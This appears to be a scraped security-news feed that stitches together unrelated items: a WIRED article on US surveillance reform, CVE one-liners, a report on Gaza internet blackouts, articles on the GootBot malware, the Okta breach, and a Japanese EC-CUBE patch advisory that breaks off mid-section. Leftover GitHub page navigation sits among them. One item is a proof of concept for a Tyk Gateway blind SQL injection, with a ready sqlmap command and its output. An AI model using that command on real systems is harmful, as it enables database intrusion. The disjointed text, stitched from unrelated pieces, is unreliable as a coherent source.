The Government Surveillance Reform Act of 2023 pulls from past privacy bills to overhaul how police and the feds access Americans’ data and communications.

In 1763, the radical journalist and colonial sympathizer John Wilkes published issue no. 45 of _North Briton_, a periodical of anonymous essays known for its virulent anti-Scottish drivel—and for viciously satirizing a British prime minister until he quit his job. The fallout from the subsequent plan of the British king, George III, to see Wilkes put in irons for the crime of being too good at lambasting his own government reverberates today, particularly in the nation whose founders once held Wilkes up as an idol, plotting a revolt of their own.

Wilkes’ arrest boiled the Americans’ blood. Reportedly, the politician-cum-fugitive had invited the king’s men into his home to read the warrant for his arrest aloud. He quickly tossed it aside. At trial, Wilkes explained its most insidious feature: “It named nobody,” he said, “in violation of the laws of my country.” This so-called general warrant, which subsequent lawsuits by Wilkes would see permanently banned, vaguely described some criminal allegations, but not a single place to be searched nor suspect to be arrested was named. This ambiguity granted the king's men near blanket authority to arrest anyone they wanted, raid their homes, and ransack and destroy their possessions and heirlooms, confiscating large bundles of private letters and correspondence. When the Americans later passed an amendment to ban vague legal warrants describing neither "the place to be searched" nor "persons or things to be seized," it was Wilkes's home, historians say, that they pictured.

This morning, a group of United States lawmakers introduced bicameral legislation aimed, once again, at reining in a government accused of arbitrarily snatching up the private messages of its own citizens—not by breaking down doors and seizing handwritten notes, but by tapping into the power of internet directly to collect an endless ocean of emails, calls, and texts. The Government Surveillance Reform Act of 2023 (GSRA)—introduced in the US House by representatives Zoe Lofgren and Warren Davidson, and in the US Senate by Ron Wyden and Mike Lee—is a Frankenstein bill more than 200 pages long, combining the choicest parts of a stack of cannibalized privacy bills that rarely made it past committee. The patchwork effect helps form a comprehensive package, targeting various surveillance loopholes and tricks at all levels of government—from executive orders signed by the president, to contracts secured between obscure security firms and single-deputy police departments in rural areas.

“Americans know that it is possible to confront our country’s adversaries ferociously without throwing our constitutional rights in the trash can,” Wyden tells WIRED, adding that for too long surveillance laws have failed to keep up with the growing threats to people’s rights. The GSRA, he says, would not strip US intelligence agencies of their broad mandate to monitor threats at home or abroad, but rather restore warrant protections long recognized as core to democracy’s functioning.

The GSRA is a Christmas list for privacy hawks and a nightmare for authorities who rely on secrecy and circumventing judicial review to gather data on Americans without their knowledge or consent. A US Justice Department requirement that federal agents obtain warrants before deploying cell-site simulators would be codified into law and extended to cover state and local authorities. Police in the US would need warrants to access data stored on people’s vehicles, certain categories of which should already require one when the information is stored on a phone. The government could also no longer buy sensitive information about people that would require a judge’s consent, had they asked for it instead.

What’s more, the bill will end a grandfather clause that’s keeping alive expired portions of the USA Patriot Act that’s allowed the FBI to continue employing surveillance techniques that have technically been illegal for two years. Petitioners in federal court seeking relief due to privacy violations will also no longer be shown the door for having no more than a “reasonable basis” to believe they’ve been wrongfully searched or surveilled.

Not to be outstripped by the sheer variety of smaller pet reforms—such as yanking the security clearances of anyone caught abusing a classified database (a crime that’s commonly punished with a slap on the wrist), or ensuring that the government can’t simply store people’s data for the rest of their lives because it hasn’t been decrypted—the GSRA principally takes aim at Section 702 of the Foreign Intelligence Surveillance Act, the government’s most promiscuous surveillance program through which it captures a large but _indeterminate_ amount of messages en route to and from Americans’ phones each day.

After 9/11, the US government commenced with some of the most extensive domestic surveillance in modern history, a monument achieved on the back of the internet’s technological revolution that redefined what it meant for people to communicate. Exposed by journalists and leakers at the height of America’s recent wars in the Middle East, the extent of the surveillance, once publicly acknowledged, unleashed bad memories of corrupt intelligence agencies relentlessly bugging anyone with a phone—actors, comedians, civil rights leaders, and even one another.

The US Congress, fearful of foreign threats, enacted only piecemeal reforms in response to these revelations, which kicked off in the early aughts and crescendoed in 2013 with Edward Snowden’s polemic leaks. The government’s sporadic but incessant updating of agency rules and procedures have done little to stymie routine abuses of the 702 data—which is currently fathomless. The first thing to know about the program, and how many Americans it ensnares each year, is that the government doesn't know the number and has little interest in learning it. A key defense, in fact, of the government's lack of transparency in this area is that examining the data to determine who is and is not an American would technically commit the very violation its procedures are designed to prevent.

While the program is strictly authorized for the surveillance of foreigners on foreign soil, wiretapping internet communications is neither accurate nor precise. In 2008, Congress was forced to effectively recognize that the collateral surveillance of Americans was the inevitable byproduct of operating an intelligence program with Big Brother–like proportions. Faced with growing privacy fears at home and emerging national security threats abroad, Congress took stock of the situation and then resigned to split the baby.

Nearly 60 years ago, in the face of overwhelming evidence that police interrogations are inherently coercive, the US Supreme Court did not ban the practice in _Miranda v. Arizona_ but rather ruled that the threat to people's rights could be reasonably mitigated by cops reading “collared” suspects a brief statement of rights—a “warning” that has much the same purpose as legal disclaimers read aloud on customer care calls. Similarly, Congress chose not to put an end to the surveillance of Americans' communication despite the enormous scale of rights violations accumulating steadily each day. Instead, it ordered the creation of many byzantine rules and procedures designed to ameliorate constitutional risks to some reasonable degree—by merely lessening the odds of a federal employee laying eyes on any illicitly gained information.

“Incidental” is a surveillance term of art referring to communications of Americans not _accidentally_ intercepted by their own government, but _unavoidably_. In a report last month, a federal privacy watchdog stressed that while the word “incidental” made the collection sound small, “it should not be understood as occurring infrequently.”

The GSRA takes aim at the use of incidental data by federal law enforcement agents, who are not bound by the same rules against spying on Americans as are analysts at the Pentagon, whose purview lies strictly overseas. While it is illegal to target US persons under 702, once they have been surveilled, the communications become accessible nevertheless to the Federal Bureau of Investigation, which has its own procedures for “querying” the nebulous database—rules that can permit, for example, the reading of emails marked “attorney-client privilege” so long as the subject isn’t wanted for a crime.

An inspector general’s investigation last year found the FBI’s own legal experts at variance over “key legal principles” tied to rules governing 702's use. Findings like these have served only to repeatedly injure the FBI, nurturing a cycle of disappointment and distrust in its capacity to behave as a competent surveillant.

The GSRA could work positively to solve many problems at the FBI. Trust in the bureau among lawmakers is only likely to grow, once its unfettered access to a digital black box filled with everyone's secrets becomes subject to court review. The GSRA removes the ability entirely for the FBI to run queries on US persons without probable cause, that is, “a reasonable amount of suspicion, supported by circumstances sufficiently strong to justify a proven and cautious person's belief that certain facts are probably true.” (In contrast, the current standard is this: Be looking for evidence of a crime, don't go fishing, and be “reasonably” confident the information you're after is “likely” to be found.)

“For too long, intelligence and law enforcement agencies have had unchecked access to Americans’ personal data,” says Lofgren, the representative from California who issued a warning to colleagues on Tuesday against the “unwise” move of reauthorizing the 702 program without “carefully considering and enacting surveillance reforms.”

The GSRA is currently the only bill in Congress that could reauthorize the 702 statute that’s set to expire by the end of the year. The statute is what allows the government to apply for “certifications” issued by the secret Foreign Intelligence Surveillance Court (FISC). These certifications, which all last for one year, allow the government to compel the cooperation of communications services providers for three purposes: foreign intelligence, counterterrorism, and the tracking of nuclear proliferation—with an array of threats, from cybercrime to narco-trafficking, all couched within those categories.

Whether or not Congress reauthorizes 702 before it expires, the collection will continue unabated until at least April, when the certifications expire. Hypothetically, the government could reapply for new certifications, which the FISC could grant before April, thereby extending the program's life into 2025 without Congress lifting a finger. That is unlikely, however, says Bob Goodlatte, former chairman of the House Judiciary Committee, who says any attempt to wrest control away from Congress will be viewed as a “hostile gesture,” further imperiling Section 702's survivability.

“The FISA Court and the Director of National Intelligence have confirmed that our government conducted warrantless surveillance of millions of Americans’ private communications,” says Senator Mike Lee.

In remarks to WIRED, Lee pointed to high-level confirmations that the US government is conducting “warrantless surveillance of millions of Americans” each day. “It is imperative that Congress enact real reforms to protect our civil liberties,” he says, including “statutory penalties for privacy violations,” a precondition of his support for “reauthorizing Section 702.”

Government Surveillance Reform Act of 2023 Seeks to End Warrantless Police and FBI Spying

Out-of-bounds Read in GitHub repository gpac/gpac prior to 2.3.0-DEV.

CVE-2023-5998

Israel has said it’s prepared to disrupt internet service in Gaza, signaling a new age of warfare. In the past two weeks, the Palestinian territory has already suffered three communications shutdowns.

Since Hamas’ tragic October attack on Israel that killed at least 1,400 people, the country’s retaliation in Gaza has led to more than 10,000 deaths, according to unverified claims from the Hamas-run Gazan Health Ministry, and broad destruction of the community's basic utilities and infrastructure. This includes its internet and communication systems, with dwindling connectivity largely cutting off 2.2 million Gazans from the outside world.

On October 27, Israel reportedly imposed a full internet shutdown in the area, cutting off the last remaining connectivity for about 34 hours as its troops moved into the Gaza Strip. After what’s left of Gaza’s internet access was restored—data shows it stands at around 15 percent or less of usual connectivity—the area has suffered two other, similar connectivity blackouts. The most recent lasted for about 15 hours on Sunday as Israel was carrying out an intense operation to cut off Gaza City in the north from southern Gaza

While researchers and technologists who monitor internet connectivity can’t conclusively say that Israel was behind the blackouts—or that they were imposed using technical controls rather than physical destruction of infrastructure—the fact that some connectivity could be restored so rapidly seems to indicate deliberate shutdowns over incidental destruction.

“In the last 10 days, there have been three periods of time that connectivity has gone to completely zero,” says Doug Madory, director of internet analysis at monitoring firm Kentik. He notes that from the data he is able to see, it's only possible to determine whether internet service providers in Gaza are communicating with the outside world and not the specific cause of an outage. One “aggressor in the conflict that's taking place in Gaza happens to have the ability to turn off service in the region that they're doing military operations in,” Madory says.

Throughout the Gaza Strip, there are around a dozen internet service providers and cell phone companies that get people online—although cell networks only use 2G technologies, as opposed to the faster 3G, 4G, and 5G connections available across much of Israel. These companies are heavily reliant on Israeli infrastructure to connect to the global internet, with open internet advocacy nonprofit the Internet Society classing Palestine as having “poor” connections to the wider internet. Since the start of the war, mobile and internet providers’ offices, cables, and cell towers have been destroyed. Many are now totally offline.

“Israel controls the telecommunication and internet that comes to Gaza,” says Husam Mekdad, a telecoms engineer living in southern Gaza in a message to WIRED. He says “most” of the main internet service providers are down, and the mobile operators that can still operate 2G connections have hugely congested networks.

“No company can repair or do anything right now,” Mekdad says. Many firms, he says, are waiting until the war is over to see the status of their infrastructure and evaluate it. The United Nations Office for the Coordination of Humanitarian Affairs said last week that 65 percent of households and businesses have lost access to the internet and half of networks have been damaged.

The Palestinian territories’ biggest internet provider, Paltel, has retained the most connectivity, according to internet analysts. But during the three complete blackouts, even Paltel has been knocked offline. “When Paltel is offline, then I think everybody's down,” Madory says.

Paltel alleges that during the three blackouts its services were being “disconnected” by Israel. The Ministry of Communications and Information Technology of the State of Palestine has also claimed there has been “systematic targeting” of networks and urged countries to “put pressure on the Israeli government” to restore connections. Paltel has not returned WIRED’s multiple requests for comment in recent weeks.

The Israeli Defense Forces declined to comment when asked whether they were behind the recent internet shutdowns in Gaza. Israel’s Ministry of Communications did not respond to WIRED’s request for comment. However, on October 17, ahead of the total blackouts, the Israeli communications ministry published an update on the war that appeared to detail its plans. “There is an ongoing examination and preparation for the shutting down of cellular communications and internet services to Gaza,” the update said.

In recent years, internet shutdowns have become a dystopian reality for millions of people in India, Iran, Pakistan, Iraq, and other countries. Last year there were 187 internet shutdowns in 35 countries, according to Access Now, a digital rights nonprofit. Internet shutdowns can do huge damage to a country’s economy as well as people’s ability to communicate with friends and loved ones and access medical care and other essential information. Typically, internet shutdowns are initiated by repressive governments trying to control protests, stop people organizing, and quell dissent. The approach is widely condemned by democratic countries, the United Nations, and human rights groups.

After internet service came back in Gaza the first time in late October, the White House wrote in a statement that “the restoration of communications in Gaza was critical. Aid workers, civilians, and journalists need to be able to communicate to each other and the rest of the world. Our Administration cared about this, worked on it, and are glad to see it restored.” The US State Department and White House National Security Council did not return requests for comment from WIRED about the implications of the two subsequent internet shutdowns in Gaza.

“Seeing intermittent shutdowns reiterates where the power to shut down actually lies,” says Helga Tawil-Souri, a digital communication and media researcher focused on Israel-Palestine at New York University. “Every major bombing campaign that Israel has taken on sees with it new strategies of what media or communication forms are allowed and what is not allowed, as in the 2008-2009 bombing of Gaza, where there was a crackdown on foreign journalists for the first time, and the 2014 bombing. The kinetic warfare, the starving, the lack of communication, lack of water, targeting solar panels—all of it just kind of works together for the total incapacitation of normal life on every possible level.”

For people living in Gaza, it’s likely that as the war continues there will be more total internet shutdowns. Some have been able to find spots of connectivity, people with access to expensive satellite phones can communicate with the outside world, and others have used eSIMs to access Israeli or Egyptian networks that reach into Gaza. These and other circumvention techniques, while a critical lifeline, have been unreliable, though, as the war rages on.

Mekdad, the network engineer in Gaza, says that with little electricity or fuel to use generators, some people are using small solar chargers to power their devices. He showed WIRED a photo of nine phones connected to a series of power outlets. “The situation is very bad. We are running out of electricity, clean water, food, and medical supplies,” Mekdad says. His relatives have fled from the north looking for safe shelter in southern Gaza. “We expected to die every second,” he says. “We just hope to stay alive.”

Internet Blackouts in Gaza Are a New Weapon in the Israel-Hamas War

An issue in BoltWire v.6.03 allows a remote attacker to obtain sensitive information via a crafted payload to the view and change admin password function.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-46501: report/boltwire/v6.03/boltwire_improper_access_control at main · Cyber-Wo0dy/report

A new variant of the GootLoader malware called GootBot has been found to facilitate lateral movement on compromised systems and evade detection.
"The GootLoader group's introduction of their own custom bot into the late stages of their attack chain is an attempt to avoid detections when using off-the-shelf tools for C2 such as CobaltStrike or RDP," IBM X-Force researchers Golo Mühr and Ole

Endpoint Security / Malware

A new variant of the GootLoader malware called GootBot has been found to facilitate lateral movement on compromised systems and evade detection.

"The GootLoader group's introduction of their own custom bot into the late stages of their attack chain is an attempt to avoid detections when using off-the-shelf tools for C2 such as CobaltStrike or RDP," IBM X-Force researchers Golo Mühr and Ole Villadsen said.

"This new variant is a lightweight but effective malware allowing attackers to rapidly spread throughout the network and deploy further payloads."

GootLoader, as the name implies, is a malware capable of downloading next-stage malware after luring potential victims using search engine optimization (SEO) poisoning tactics. It's linked to a threat actor tracked as Hive0127 (aka UNC2565).

The use of GootBot points to a tactical shift, with the implant downloaded as a payload after a Gootloader infection in lieu of post-exploitation frameworks such as CobaltStrike."

Described as an obfuscated PowerShell script, GootBot is designed to connect to a compromised WordPress site for command and control and receive further commands.

Complicating matters further is the use of a unique hard-coded C2 server for each deposited GootBot sample, making it difficult to block malicious traffic.

"Currently observed campaigns leverage SEO-poisoned searches for themes such as contracts, legal forms, or other business-related documents, directing victims to compromised sites designed to look like legitimate forums where they are tricked into downloading the initial payload as an archive file," the researchers said.

The archive file incorporates an obfuscated JavaScript file, which, upon execution, fetches another JavaScript file that's triggered via a scheduled task to achieve persistence.

In the second stage, JavaScript is engineered to run a PowerShell script for gathering system information and exfiltrating it to a remote server, which, in turn, responds with a PowerShell script that's run in an infinite loop and grants the threat actor to distribute various payloads.

This includes GootBot, which beacons out to its C2 server every 60 seconds to fetch PowerShell tasks for execution and transmit the results of the execution back to the server in the form of HTTP POST requests.

Some of the other capabilities of GootBot range from reconnaissance to carrying out lateral movement across the environment, effectively expanding the scale of the attack.

"The discovery of the Gootbot variant highlights the lengths to which attackers will go to evade detection and operate in stealth," the researchers said. "This shift in TTPs and tooling heightens the risk of successful post-exploitation stages, such as GootLoader-linked ransomware affiliate activity."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New GootLoader Malware Variant Evades Detection and Spreads Rapidly

By Deeba Ahmed
GootBot: New Gootloader Variant Evades Detection with Stealthy Lateral Movement.
This is a post from HackRead.com Read the original post: IBM X-Force Discovers Gootloader Malware Variant- GootBot

The original Gootloader malware was used by numerous threat groups, including ransomware affiliates and in additional payloads like SystemBC and IcedID.

IBM X-Force has discovered a new variant of the notorious **Gootloader malware**, dubbed GootBot. This malware performs stealthy lateral movement, which complicates the detection or blocking of the campaign within enterprise networks.

According to the **blog post** authored by Golo Mühr and Ole Villadsen, the Gootloader group implements their custom bot in the latter stages of this attack chain to evade detection, using off-the-shelf tools for establishing C2 communication, such as RDP or CobaltStrike.

Gootloader malware was initially used only as an initial access tool and evolved considerably over time to include GootBot, a lightweight obfuscated PS script. It is downloaded after the Gootloader infection and receives commands via C2 through encrypted PowerShell scripts.

For your information, the Gootloader group (aka UNC2565 or Hive0127) first surfaced in 2014 and focused more on SEO poisoning techniques and compromised WordPress websites to distribute the Gootkit-based Gootloader malware. Tanium’s director of endpoint security research, Melissa Bischoping, explained how **SEO poisoning** works. 

One of the hacked websites used in delivered Gootloader malware (Image: Sophos)

“SEO poisoning drives users to malicious payloads by manipulating the search results for key terms. Most security awareness training focuses heavily on phishing and other methods where an attacker sends something to the user. There’s a false sense of security that people place in search result top rankings and an outdated mindset that the lock on the address bar means a site is safe.”

Hackread.com has been following the Gootloader group’s activities since its emergence. The group frequently targets business-related online searchers like queries about legal contracts, creating legit-looking websites, and positioning them on the first page of search results. Once the user visits the page, they entice them into downloading archive files, which appear harmless and relevant to their queries but actually contain Gootloader malware.

In March 2021, Sophos cybersecurity firm **confirmed** that Gootloader has evolved into a sophisticated loader framework from serving as an initial access point, revealing that its delivery method had expanded beyond the Gootkit malware family. As an initial access point, Gootloader malware was used by numerous threat groups, including ransomware affiliates and in additional payloads like SystemBC and IcedID.  

GootBot is a novel Gootloader variant. It is a PowerShell payload encapsulating a single C2 server address. Its strings use a replacement key to conduct mild obfuscation. The malware, just like Gootloader, sends a GET request to the C2 server, requesting PowerShell tasks, and gets a string comprising a Base64-encoded payload.

The last 8 digits of the code are the task’s name. It then decodes the payload and injects it into the script block before executing it. The payload runs asynchronously, maintaining a default beaconing interval of 60 seconds. When it receives a C2 task, the next loop iteration starts, and for completed jobs, the results are returned.

GootBot is designed for lateral movement within the network, noted X-Force researchers. Its C2 infrastructure can quickly generate numerous GootBot payloads for distribution, each having a unique C2 address, and can cause multiple infections of the same host. It also runs a reconnaissance script and contains a unique GootBot ID for the host.

This effective malware lets attackers swiftly propagate across the compromised network to deploy additional malicious software. Unlike Gootloader, GootBot spreads through infected domains to reach the domain controller. This indicates a shift in attack tactics from Gootloader operators and enhances the success rate of post-exploitation stages, including Gootloader-based ransomware affiliate activity.

The malware is capable of extracting domain user name, and OS details from the registry key, checks for x86 dir and int ptr size if 64bit architecture is detected, and obtains information about domain controllers from registry and ENV var, SID, local IP address, hostname, and running processes. The data gets formatted with the specified ID.

The emergence of the GootBot variant highlights that attackers are employing sophisticated methods to stay undetected and spread laterally across the network. Lateral-movement scripts are possible through various techniques, such as WinRM, SMB, and WinAPI calls, to spread the payload to other hosts.

Infection diagram

Organizations must implement advanced security mechanisms, including endpoint detection and response (EDR) solutions and regularly updating software to prevent the threat. Bugcrowd cybersecurity firm’s founder and chief strategy officer, **Casey Ellis**, shared the following statement with Hackread.com regarding the current Gootloader campaign.

“This all strikes me as a very organized and thoughtful initial access broker (IAB). Their watering-hole style deployment of malicious SEO isn’t particularly targeted, however, it suits the opportunistic attack model of an IAB quite well. For defenders, it’s important to remember that organized cybercrime is continuing to evolve, stratify, and mature and that the threat actor behaviours now include this type of long, wide game.”

Keeper Security’s CEO and co-founder, **Darren Guccione**, in an exclusive statement shared with Hackread.com, noted that it is hard for innocent users to distinguish between authentic and fabricated search results, which makes SEO poisoning so successful.

“Innocent people who are not trained on SEO (Search Engine Optimization) and SEO-related attack vectors, including SEO poisoning, generally focus on the aesthetics of the search results page they are familiar with such as the domain name and the logos displayed. Often, threat actors will use language like “Official Website” to lure people into clicking a dangerous link or visiting a spoofed site that can download Gootloader or other malware onto their device.”

However, some scrutiny can prove beneficial in detecting malicious websites, said Guccione. “Phony or spoofed websites will usually have a different website address than the official company name and can also use different domain extensions than the one for the legitimate website. The majority of popular websites use the domain extension .com,” explained Guccione. 

“If you visit a site, pay special attention to the domain itself and if it appears to be abnormally long or unrecognizable based on your normal search activity, it’s best to ignore it – and not click on any link. Online tools such as a Google Transparency Report can also be used to determine whether a site is safe.”

1.  Google Algorithm Updates vs SEO Strategies
2.  How Can SEO Help Increase Website Security?
3.  Google Indexed Trove of Bard AI User Chats in Search Results
4.  Ad-blocker Chrome extension AllBlock injected ads in Google searches
5.  Malicious Chrome, Edge extensions manipulating Google search results

IBM X-Force Discovers Gootloader Malware Variant- GootBot

When a homeless man attacked a former city official, footage of the onslaught became a rallying cry. Then came another video, and another—and the story turned inside out.

What a Bloody San Francisco Street Brawl Tells Us About the Age of Citizen Surveillance

Okta has concluded that the root cause of its breach was an employee storing company credentials in a private Google account.

Okta has revealed details about a recent breach which exposed files belonging to customers.

As we explained in our article about 1Password being a victim of this breach, it’s normal for Okta support to ask customers to upload a file known as an HTTP Archive (HAR) file. Having this file allows the team to troubleshoot issues by replicating what’s going on in the browser. As such, a HAR file can contain sensitive data, including cookies and session tokens, that cybercriminals can use to impersonate valid users.

After 1Password, BeyondTrust, and Cloudflare detected unauthorized log-in attempts to their in-house Okta administrator accounts, they reported the incidents to Okta who started an investigation.

Okta says it found that from September 28 to October 17, 2023 an attacker had unauthorized access to files inside Okta’s customer support system associated with 134 Okta customers.

The attacker gained access using stolen credentials of a service account stored in the system itself, which had permissions to view and update customer support cases.

To gain access to that service account, the attacker compromised an Okta employee. The employee logged into the service account while they were signed in to their personal Google profile in Chrome on their Okta-managed laptop. That meant that the credentials of the service account were stored in the employee’s personal Google account.

How they got from that account into the attacker’s hands is unknown, but likely the attacker compromised that personal account or one of the employee’s devices fell into the attacker’s hands, from where they could accessed the Google account and harvested the credentials.

Once in, the attacker was able to use session tokens in the HAR files to impersonate staff and hijack the legitimate Okta sessions of five customers, including 1Password, BeyondTrust, and Cloudflare.

Okta says it has now locked down personal Google access on company-managed computers:

> “Okta has implemented a specific configuration option within Chrome Enterprise that prevents sign-in to Chrome on their Okta-managed laptop using a personal Google profile.”

In general, it’s hard to strictly separate the use of devices for work purposes— in a 2020 survey by Malwarebytes, we found that the majority of people do use work devices for personal use. When a device gets assigned to an employee, they consider it more or less as “theirs” and there’s a tendency to start using it for personal matters. Okta could have anticipated this behavior and added additional security measures for such an important account.

A remediation task that is important to note for Okta customers is:

> “Okta has released session token binding based on network location as a product enhancement to combat the threat of session token theft against Okta administrators. Okta administrators are now forced to re-authenticate if we detect a network change. **This feature can be enabled by customers in the early access section of the Okta admin portal.**”

**Data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

 Okta breach happened after employee logged into personal Google account 

Blind SQL injection in api_version parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query.

**Disclaimer**

For educational purpose only!

**Details**

Proof of concept for CVE-2023-42284. Tyk Gateway is vulnerable to SQL injection. Fixed in 5.0.7 version.

The URL parameter ‘api\_version’ of the "https://<YOUR\_URL>/api/errors/count/...?res=day&p=...&api\_version=<PAYLOAD\_HERE>&api\_id=..."is vulnerable to Blind SQL injection.

**Exploitation**

Use sqlmap with following parameters:

    python.exe .\sqlmap.py -u "https://<INSERT YOUR URL>/api/errors/count/11/8/2022/13/1/2022?res=day&p=-1&api_version=Non%20Versioned&api_id=<INSERT YOUR API_ID>" -p "api_version" --cookie="<INSERT COOKIE HERE> --banner
    

SQL DB banner is returned in response:

    ...
    banner: Postgresql 13.01 on x86_64-pc-linux-gnu
    ...

CVE-2023-42284: GitHub - andreysanyuk/CVE-2023-42284: Proof of concept for CVE-2023-42284 in Tyk Gateway

EC-CUBE 3 series (3.0.0 to 3.0.18-p6) and 4 series (4.0.0 to 4.0.6-p3, 4.1.0 to 4.1.2-p2, and 4.2.0 to 4.2.2) contain an arbitrary code execution vulnerability due to improper settings of the template engine Twig included in the product. As a result, arbitrary code may be executed on the server where the product is running by a user with an administrative privilege.

**更新履歴**

2023/11/09 15:00

目次の追加

2023/11/07 14:00

JVNからの公表内容情報へのリンクを追加

2023/10/26 13:00

初版公開

**目次**

*   EC-CUBEにおけるRCE可能な脆弱性
*   脆弱性の概要
*   Twigの更新手順
*   修正方法1: 修正ファイルを利用する場合(4.0系)
*   修正方法2: 修正差分を確認して適宜反映する場合(4.0系)
*   問い合わせ先
*   謝辞

**EC-CUBEにおけるRCE可能な脆弱性**

EC-CUBE 4.0系におけるRCE可能な脆弱性(危険度: 低)があることが判明いたしました。

脆弱性そのものは、修正の反映によりすぐに解決するものです。  
以下のいずれかの方法により、ご対応をお願いいたします。

*   修正ファイルを適用する
*   修正差分を確認して適用する

皆様にはお手数おかけし誠に申し訳ございません。  
本脆弱性における被害報告は現時点でございませんが、できるだけ速やかにご対応をお願いいたします。

**脆弱性の概要****EC-CUBEにおけるRCE可能な脆弱性****危険度:**

低

**不具合が存在するEC-CUBEのバージョン:**

*   **4.0.0〜4.0.6-p3**

**詳細:**

該当バージョンのEC-CUBEにはRCE可能な脆弱性が存在します。EC-CUBEはテンプレートエンジンとしてTwigを利用していますが、EC-CUBEの一部画面でTwigに対する設定不備が存在し、攻撃者が対象のシステム上で任意のコードを実行できる可能性があります。

**JVNからの公表内容 (2023/11/07公開)**

JVN#29195731: EC-CUBE 3系および 4系において任意のコードを実行される脆弱性

*   EC-CUBE 3系および 4系において任意のコードを実行される脆弱性 CVE-2023-46845

**Twigの更新手順**

EC-CUBE4.0系で利用している場合、Twigの不具合によりSandBox機能が動作しません。  
修正方法を実施する前に、Twigのアップデートを行ってください。

Twigをアップデートするためには、composerを使用する方法とファイルを手動でアップデートする方法の2つがあります。  
以下のどちらかを実施してください。

*   **composerコマンドにて、Twigをアップデート:**
    
    以下のコマンドを実行し、Twigを新しいバージョンに更新してください。  
    $ composer update twig/twig  
    $ composer update twig/extensions
    
    また、以下のコマンドを実行し、Twigが更新されていることを確認してください。
    
    $ composer show twig/twig  
    ※以下のように表示されることを確認してください。  
    name : twig/twig  
    versions : \* v2.15.5
    
    $ composer show twig/extensions  
    ※以下のように表示されることを確認してください。  
    name : twig/extensions  
    versions : \* v1.5.4
    

*   **Twigのファイルを手動でアップデート:**
    
    Twigを手動でアップデートする時は、以下の手順に従ってください。
    
    twig/twigのファイルを以下のURLからダウンロードします。  
    https://github.com/twigphp/Twig/archive/refs/tags/v2.15.5.zip
    
    \[EC-CUBEの設置先\]/vendor/twig/twigディレクトリ内を削除してください。  
    ダウンロードしたZIPファイルを\[EC-CUBEの設置先\]/vendor/twig/twigディレクトリに展開してください。
    
    twig/extensionのファイルを以下のURLからダウンロードします。  
    https://github.com/twigphp/Twig-extensions/archive/refs/tags/v1.5.4.zip
    
    \[EC-CUBEの設置先\]/vendor/twig/extensionsディレクトリ内を削除してください。  
    ダウンロードしたZIPファイルを\[EC-CUBEの設置先\]/vendor/twig/extensionsディレクトリに展開してください。
    
    ファイルが正しく上書きされたことを確認してください。  
    また、EC-CUBEの動作を確認し、テンプレートが正しく表示されることを確認してください。
    

**修正方法1: 修正ファイルを利用する場合**(4.0系)****

**※本修正を実施する前に、Twigの更新を必ず行ってください。**

開発環境がある場合は、まず開発環境でお試しください。  
以下の手順に従って、修正ファイルの反映をお願いいたします。

1.  修正ファイルのダウンロード
    
    ご利用中のEC-CUBEのバージョンに該当する修正ファイルをダウンロードしてください。  
    ※EC-CUBEのバージョンはこちらの手順でご確認ください。  
    ※修正ファイルは各バージョンの最新版に対して作成しています。旧バージョンをご利用の場合は、「修正方法2」のご対応をお願いします。  
    ※対象のファイルに対して既にカスタマイズをしている場合は、「修正方法2」のご対応をお願いします。
    
    *   **修正ファイル(4.0.6-p3)** (SHA256:0bcbb847ea1aaf8443f49f30015066122ce27f253574dcc92cae4b5859a6646f)
    
    ダウンロードし、解凍していただきますと、以下の修正ファイルがあります。必ず該当するバージョンのファイルをご利用ください。
    
    **4.0.6-p3**
    *   app/config/eccube/packages/twig\_extensions.yaml
    *   src/Eccube/Resource/template/default/Product/detail.twig
    *   src/Eccube/Resource/template/default/default\_frame.twig
    *   src/Eccube/Twig/Extension/IgnoreTwigSandboxErrorExtension.php
    *   src/Eccube/Twig/Sandbox/SecurityPolicyDecorator.php
2.  EC-CUBEファイルのバックアップ
    
    あらかじめEC-CUBEファイル全体のバックアップを行ってください。  
    
3.  修正ファイルの反映
    
    以下のファイルを上書き更新してください。
    
    上書きするファイル
    
    **4.0.6-p3**
    
    *   app/config/eccube/packages/twig\_extensions.yaml
    *   src/Eccube/Resource/template/default/Product/detail.twig
    *   src/Eccube/Resource/template/default/default\_frame.twig
    *   src/Eccube/Twig/Extension/IgnoreTwigSandboxErrorExtension.php
    *   src/Eccube/Twig/Sandbox/SecurityPolicyDecorator.php
    
    下記にファイルが存在する場合は同様に上書きをお願いします
    
    *   app/template/default/Product/detail.twig
    *   app/template/default/default\_frame.twig
    
    また、snippet.twigに関してはプラグインで拡張する箇所となるため対応不要となります。
    
    ※デザインテンプレートの適用や、EC-CUBE本体のカスタマイズをしている場合、修正箇所の差分をご確認のうえ反映をお願いします。  
    ※開発環境がある場合は、開発環境での反映・動作確認を行った後に、本番環境への反映をおすすめします。
4.  キャッシュの削除
    
    EC-CUBE のキャッシュの削除が必要です。  
    EC-CUBE の管理画面にログインいただき、コンテンツ管理 -> キャッシュ管理 のページからキャッシュの削除をお願いいたします。
    
5.  動作確認
    
    フロント画面と管理画面（ログインが必要）それぞれにおいて、基本操作が正常に行えることをご確認ください。  
    

**修正方法2: 修正差分を確認して適宜反映する場合**(4.0系)****

**※本修正を実施する前に、Twigの更新を必ず行ってください。**

